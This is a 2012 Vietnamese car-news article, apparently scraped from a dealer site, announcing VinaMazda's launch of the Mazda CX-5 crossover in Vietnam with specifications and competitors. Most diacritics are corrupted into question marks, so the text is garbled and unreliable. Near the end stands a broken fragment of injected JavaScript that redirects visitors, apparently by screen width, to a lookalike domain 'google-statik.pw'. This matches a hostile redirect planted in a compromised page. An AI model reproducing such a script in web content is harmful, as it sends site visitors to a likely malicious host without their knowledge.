Mazda CX-5 về VN, Hyundai Tucson có đối thủ
Thứ tư, 04 Tháng 4 2012 16:10

(otobienhoa.vn) – Cung v?i Miata MX-5, VinaMazda s? mang m?u Crossover c? nh?, 5 ch? ng?i – Mazda CX-5 v? Vi?t Nam, c?nh tranh tr?c ti?p v?i cac d?i th? nhu Hyundai Tucson, Kia Sportage, Honda CR-V va cao hon la BMW X1.

alt

alt

Vao ngay 13/04/2012 t?i day, VinaMazda s? d?ng lo?t gi?i thi?u cac m?u xe m?i nhu Miata MX-5 mui tr?n, CX-5 Crossover va nh?ng m?u xe th? h? m?i nhu Mazda2, Mazda3, CX-9 d?i 2012. Nhu v?y, t?i Vi?t Nam da hi?n di?n g?n nhu d?y d? cac dong xe Mazda, them nhi?u s? l?a ch?n hon cho khach hang trong nu?c.

Mazda CX-5 phien b?n 2012, m?u xe th? thao da d?ng nang d?ng, ca tinh c?a  hang xe hoi Nh?t B?n, s? du?c Vina Mazda gi?i thi?u t?i Vi?t Nam v?i d?ng co xang 2.0L, cho cong su?t 154 ma l?c, k?t h?p cung h?p s? t? d?ng 6 c?p v?i 2 tuy ch?n 1 c?u ho?c 2 c?u. Xe CX-5 vu?t tr?i v?i kh? nang ti?t ki?m nhien li?u vu?t tr?i trong phan khuc SUV v?i m?c tieu hao nhien li?u ch? 6,9 lit/100km. Di?m nh?n c?a Mazda CX-5 la d?ng co, h?p s?, khung g?m va h? th?ng treo du?c thi?t k? theo cong ngh? Skyactiv tien ti?n hoan toan m?i.

N?i th?t Mazda CX-5 du?c trau chu?t t? m? va trang thi?t b? phong phu nhu: Gh? tru?c ch?nh di?n 8 hu?ng, h? th?ng gh? da cao c?p co ch?c nang su?i va thong gio, c?a s? tr?i, cong ngh? ch?ng bo c?ng phanh ABS, dai an toan 3 di?m…

N?i b?t trong cac dong s?n ph?m m?i, Mazda CX-5 cung la m?t dong xe du?c ua chu?ng c?a Mazda tren th? gi?i. Mazda cho bi?t CX-5 la m?u xe s?n xu?t th?c t? d?u tien c?a hang s? d?ng ngon ng? thi?t k? “Kodo - Linh h?n c?a chuy?n d?ng” - da xu?t hi?n tren cac m?u concept Minagi va Shinari. Di?m n?i b?t c?a ngon ng? thi?t k? m?i nay la mui xe nho len va phong cach nang d?ng hon, ma cong ty gi?i thich la dem d?n “c?m giac ro rang v? s?c s?ng va s? nhanh nh?n”.

VinaMazda chua cho bi?t c? th? gia ban CX-5 t?i Vi?t Nam. Du?c bi?t, ? th? tru?ng nu?c ngoai, Mazda CX-5 co gia ban tieu chu?n cao hon cac d?i th? c?nh tranh nhu Hyundai Tuscon, Kia Sportage. D?i l?i, Mazda h?a h?n xe CX-5 cho c?m giac lai ch? d?ng, th? thao hon, chua k? m?c tieu th? nhien li?u kha nh?t trong phan khuc crossover c? nh?.

alt

alt

alt

alt

alt

alt

alt

alt

alt

Theo: H?ng An (Autovina)
if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo